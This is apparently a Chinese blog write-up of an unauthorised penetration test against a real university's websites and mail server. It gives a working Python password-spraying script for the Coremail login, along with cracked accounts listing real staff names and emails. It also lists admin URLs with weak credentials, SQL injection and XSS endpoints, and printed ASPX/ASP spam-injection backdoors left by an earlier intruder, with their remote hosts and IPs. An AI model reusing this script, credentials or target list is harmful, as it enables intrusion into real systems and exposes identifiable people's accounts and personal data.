0x05 没想到吧 我没写完

其实还有很多搞头,今天先说一个。
学校使用的coremail v5使用的策略是: 一个邮箱+多次尝试=封IP
我们就可以采用策略: 多个邮箱+一次尝试=爆破成功
随手写了个小小的爆破程序,带来了很多惊喜哦。

#!/usr/bin/python
# __author__ = 'jasonsheh'
# -*- coding:utf-8 -*-

import requests

def main():
    password = [自己收集]
    for pwd in password:
        with open('jitemail.txt', 'r') as file:
            for eachline in file:
                name, email = eachline.strip().split('\t')
                url = 'http://mailin.jit.edu.cn/coremail/index.jsp?cus=1'
                data = {'locale': 'zh_CN', 'uid': email, 'nodetect': 'false', 'password': pwd, 'action:login': ''}
                r = requests.post(url=url, data=data, allow_redirects=False)

                if r.cookies.values():
                    print('name:%s\t\temail:%s\t\tpassword:%s\t\t\tright' % (name, email, pwd))
                else:
                    print('name:%s\t\temail:%s\t\tpassword:%s\t\t\twrong' % (name, email, pwd))

if __name__ == '__main__':
    main()

惊喜如下:

name:王倩倩             email:wq20045147@jit.edu.cn     password: w******7
name:陈洁               email:cj022064@jit.edu.cn       password: c******4
name:胡国兵             email:s0304152@jit.edu.cn       password: s******2
name:现代教育中心        email:xjzx@jit.edu.cn           password: 1******6	
name:test3              email:testp@jit.edu.cn          password: 1******6	
name:杨亚楠             email:yangyanan@jit.edu.cn      password: 1******6
name:计算机基础教学部    email:jcjxb@jit.edu.cn          password: 1******6
name:马静飞             email:mjf@jit.edu.cn             password: 1******6
name:信息团总支          email:jsjtzz@jit.edu.cn	        password: 1******1	

逛了一圈硬是没找到什么有用的,除了能登陆一个http://jl.cstor.cn/OA_Login/loginDefault.jsp
但是这并不在我们的目标之内,而且也没什么可以利用的。

0x02 发现的漏洞

在整个渗透过程中突破口就在大量相似重复的弱口令,绝大多数后台登录都会在输入错误的用户名后提示”用户未注册”,并且未设置验证码对爆破进行限制,用简单的字典即可爆破出绝大多数的密码。

然后后台上传功能限制的较严格,只能收集后台用户名,有的后台中有大量教师的身份证和手机号。

两个webshell的get十分简单,几乎没有难度,但是由于网站都是建立在虚拟机之上,对进一步的渗透造成了大量困扰。

其中一个服务器已经被入侵过,将在之后的文章进行分析。

弱口令
http://art.jit.edu.cn/Login.aspx
c****j 111111

http://art.jit.edu.cn/dress/logon.aspx
c****j 111111

http://xbbjb.jit.edu.cn/Login.aspx(失效)
x****b xbbjb

http://zkxy.jit.edu.cn/admin/index.php?iframe=1
a****n admin

http://kjy.jit.edu.cn/admin/login.aspx
a****n admin

http://clhx.jit.edu.cn/admin/Login.asp
a****n 000000

http://dkxy.jit.edu.cn/admin/index.aspx
a****n admin888(DTcms默认密码)

http://sec.jit.edu.cn/
c****j 111111
注入
http://gfzcl.jit.edu.cn/showts.asp?id=544

http://sbc.jit.edu.cn/login.aspx

http://art.jit.edu.cn/Login.aspx

http://art.jit.edu.cn/dress/logon.aspx

http://180.96.20.182/Course/page/event_single_info.jsp?list_id=11
xss
http://lib.jit.edu.cn/
遍地都是
通用漏洞
DTcms 上传ashx生成aspx一句话
文件上传
http://zkxy.jit.edu.cn/admin/
齐博后台任意修改上传白名单

具体的漏洞利用方式我就不多说了,大家搜一下都会做的。

最后附上两个webshell

0x03 后续
在其中一个服务器上发现了已经被黑的迹象。
甚至还留了聊天记录在上面,但是我现在看就找不到了,很难受。
118.184.35.163
118.184.34.254
118.184.43.79
118.184.45.97
118.184.38.249
122.10.118.56
222.186.43.99:88
http://www.51banzheng.cc/
http://www.51banzheng.pw/
留下了很多的aspx文件,里面有以上这些ip
主要有两种文件

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
...
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

<script runat="server">
    public string GetHttp(string url)
    {
        HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(url);
        httpWebRequest.ContentType = "application/x-www-form-urlencoded";
        httpWebRequest.UserAgent = "aQ0O010O";
        httpWebRequest.Method = "GET";
        httpWebRequest.Timeout = 999999;
        HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();
        StreamReader streamReader = new StreamReader(httpWebResponse.GetResponseStream(), Encoding.GetEncoding("GB2312"));
        string responseContent = streamReader.ReadToEnd();
        httpWebResponse.Close();
        streamReader.Close();
        return responseContent;
    }///实现了一个get请求,指定了UserAgent"aQ0O010O"


    protected void Page_Load(object sender, EventArgs e)
    {

        string Remote_server = "http://www.51banzheng.pw/6670/";
        string host_name = "http://" + Request.ServerVariables["HTTP_HOST"] + Request.ServerVariables["script_name"];
        ///获取完整url
        string Remote_file = Remote_server + "/index.php" ///"http://www.51banzheng.pw/6670//index.php"
        + "?host=" + host_name ///获取完整url 
        + "&url=" + Request.ServerVariables["Query_String"] ///查询HTTP请求中?后的信息
        + "&domain=" + Request.ServerVariables["Server_Name"]; ///主机名
        string Content_mb = GetHttp(Remote_file);
        Response.Write(Content_mb);

    }
</script>
<%
server.Scripttimeout=2324223
host_name="http://"&request.servervariables("HTTP_HOST")&request.servervariables("script_name")
///获取完整url
Remote_file = "http://www.yegou.space/kaoshi2//index.php"&"?host="&host_name
Content_mb=GetHtml(Remote_file)
response.write Content_mb
%>
<%
Function GetHtml(url)
	Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
	ObjXMLHTTP.Open "GET",url,False
	ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"
	ObjXMLHTTP.send
	GetHtml=ObjXMLHTTP.responseBody
	Set ObjXMLHTTP=Nothing
	set objStream = Server.CreateObject("Adodb.Stream")
	objStream.Type = 1
	objStream.Mode =3
	objStream.Open
	objStream.Write GetHtml
	objStream.Position = 0
	objStream.Type = 2
	objStream.Charset = "gb2312"
	GetHtml = objStream.ReadText
	objStream.Close
End Function
%>
///实现了一个get请求,指定了UserAgent"aQ0O010O",asp版

功能是当用户访问类似http://target/?q7esl/lixux.html时,出现的是远程服务器上添加了广告的虚假页面

从User-Agent可以看出这两个文件应该是同一个人所写,访问www.51banzheng.cc,出现的也是相同的内容

0x04 总结

渗透测试是一个持久的过程,其中耐心十分重要,许多漏洞需要仔细发掘。此外,学校的安全意识相当差,南软科大任重道悠啊(逃。

0x00 起因
学安全也有一段时间了,大部分发现的漏洞都是针对某种特定类型,对大量站点进行测试从而找到的。对特定的某一个站点的检测还不够熟练,因此就拿自己的母校开刀,运用自己学过的知识。

0x01 信息收集
信息收集是渗透测试中最基础也相当重要的一步。

首先确定渗透的范围与可能存在的漏洞

域名:
3g.jit.edu.cn
acc.jit.edu.cn
art.jit.edu.cn art.jit.edu.cn/Login.aspx弱口令(确认)
bsxt.jit.edu.cn
business.jit.edu.cn business.jit.edu.cn/openlab/index.aspx弱口令(确认)
bwc.jit.edu.cn
ca.jit.edu.cn
clhx.jit.edu.cn clhx.jit.edu.cn/admin/
clsj.jit.edu.cn 403
clsy.jit.edu.cn 注入:clsy.jit.edu.cn/content.asp?id=1411(确认)
clsygl.jit.edu.cn
clxy.jit.edu.cn 403
cwc.jit.edu.cn
cyw.jit.edu.cn
dag.jit.edu.cn dag.jit.edu.cn/login.aspx
dangb.jit.edu.cn
dh.jit.edu.cn 建设中
dkxy.jit.edu.cn 邮箱:dkx@jit.edu.cn dkxy.jit.edu.cn/admin/login.aspx
dm.jit.edu.cn dm.jit.edu.cn/index.aspx弱口令(确认)
dxxy.jit.edu.cn 邮箱:jsjx@jit.edu.cn EmpireCMS dxxy.jit.edu.cn/e/admin/
ecard.jit.edu.cn 403
en.jit.edu.cn 新视野大学英语
gfzcl.jit.edu.cn 注入:gfzcl.jit.edu.cn/showts.asp?id=631(确认)
                 gfzcl.jit.edu.cn/admin/Login.asp
gh.jit.edu.cn
ghc.jit.edu.cn
green.jit.edu.cn
hgkc.jit.edu.cn hgkc.jit.edu.cn/AdmLogin.aspx
hqzgs.jit.edu.cn 邮箱:hqzgs@jit.edu.cn
iec.jit.edu.cn
it.jit.edu.cn it.jit.edu.cn/admin/login.asp
jcb.jit.edu.cn 用户名:cenpar jcb.jit.edu.cn/cp_jcb_admin/Admin_Login.asp
jcbjpkc.jit.edu.cn 403
jdxy.jit.edu.cn jdxy.jit.edu.cn/asoula2011/login.asp
jg.jit.edu.cn jg.jit.edu.cn/Login.asp jgxy@jit.edu.cn
jitrsc.jit.edu.cn 223.2.194.43:8080/system/login.jsp 博达v6.0
jitxcb.jit.edu.cn
jjc.jit.edu.cn 邮箱:jjc@jit.edu.cn
jsclx.jit.edu.cn jsclx.jit.edu.cn/admin/
jw.jit.edu.cn 邮箱:jw@jit.edu.cn
jwxt.jit.edu.cn 正方教务系统
jxpg.jit.edu.cn
kjc.jit.edu.cn 邮箱:kjc@jit.edu.cn
kjy.jit.edu.cn kjy.jit.edu.cn/admin/login.aspx 弱口令(确认)
lib.jit.edu.cn lib.jit.edu.cn/Login.aspx 弱口令(确认)
lpxy.jit.edu.cn 邮箱:lpxy@jit.edu.cn
ltc.jit.edu.cn 邮箱:ltc@jit.edu.cn
lyzx.jit.edu.cn lyzx.jit.edu.cn/asoula2008/login.asp
my.jit.edu.cn SDCMS 
new.jit.edu.cn 邮箱:szb@jit.edu.cn
nsi.jit.edu.cn 邮箱:nsi@jit.edu.cn
old.jit.edu.cn
opac.jit.edu.cn opac.jit.edu.cn/opac/search_adv_result.php反射型xss(确认)
                储存型xss(确认) 可以打到爱读书的同学们
                这个很好玩,可以慢慢搞
rwxy.jit.edu.cn 邮箱:rwxy@jit.edu.cn
sbc.jit.edu.cn sbc.jit.edu.cn/index.aspx 弱口令(确认)
science.jit.edu.cn science.jit.edu.cn/login.aspx 弱口令(确认)
sg.jit.edu.cn 邮箱:dkx@jit.edu.cn
sjc.jit.edu.cn sjc.jit.edu.cn/login.asp 邮箱:sjc@jit.edu.cn
soft.jit.edu.cn soft.jit.edu.cn/e/admin/index.php 
                soft.jit.edu.cn//robots.txt 邮箱:rjxy@jit.edu.cn
twweb.jit.edu.cn 用户名:admin jitxsh 邮箱:tw@jit.edu.cn
webyb.jit.edu.cn webyb.jit.edu.cn/hysyy/yycx.htm xss(可能)
jwc.jit.edu.cn
hqc.jit.edu.cn 用户名:hqc
wt.jit.edu.cn wt.jit.edu.cn/login.aspx 用户名:admin admin2 tucat  wtxy@jit.edu.cn
www.jit.edu.cn
xbbjb.jit.edu.cn 原先可以登陆 弱口令(确认) 不知道为什么现在不能登陆了
xkjs.jit.edu.cn xkjs.jit.edu.cn/Account/LogOn  邮箱:sjk@jit.edu.cn
xlcp.jit.edu.cn 用户名:admin 陈智慧(6762)邮箱:sophia@jit.edu.cn
xsc.jit.edu.cn
xxzx.jit.edu.cn
yulu.jit.edu.cn yulu.jit.edu.cn/admin/login.aspx 用户名:zwr tucat
yx.jit.edu.cn
yyx.jit.edu.cn 邮箱:yyx@jit.edu.cn 
zkxy.jit.edu.cn  zkxy.jit.edu.cn/admin 弱口令(确认) 邮箱:zhikong@jit.edu.cn
znyywlw.jit.edu.cn 8880端口 登陆 弱口令(确认)
zys.jit.edu.cn aspx 登陆入口 用户名:admin xss(可能)
zzb.jit.edu.cn 邮箱:zzb@jit.edu.cn 还有这备案号苏ICP备100000号一看就瞎写的
wechat.jit.edu.cn: 210.28.189.120 泛微云桥 默认:sysadminm密码:1(无效)
ws.jit.edu.cn:	218.94.92.245 iis6.0 建设中
vpn.jit.edu.cn:	218.94.92.246 远程访问系统软件 Welcome.enlink
mail.jit.edu.cn: 221.226.37.163 coremail v5.0
m.jit.edu.cn:	221.226.37.165 统一通信平台
hq.jit.edu.cn:	223.2.194.49 Apache Tomcat 弱口令(可能)

对收集到的信息的汇总

使用到的cms:
可能是自己编写的一款
帝国
my动力
SDCMS
PUBCMS
DTCMS
coremail
博达v6.0
正方教务系统
齐博

大多为iis6.0 + aspx/asp

邮箱多为二级域名+jit.edu.cn

常用ip段
210.28.189.*
210.28.185.*

端口开放
多为80和443
没见到过特殊服务的,可能是因为校园网用不到那些服务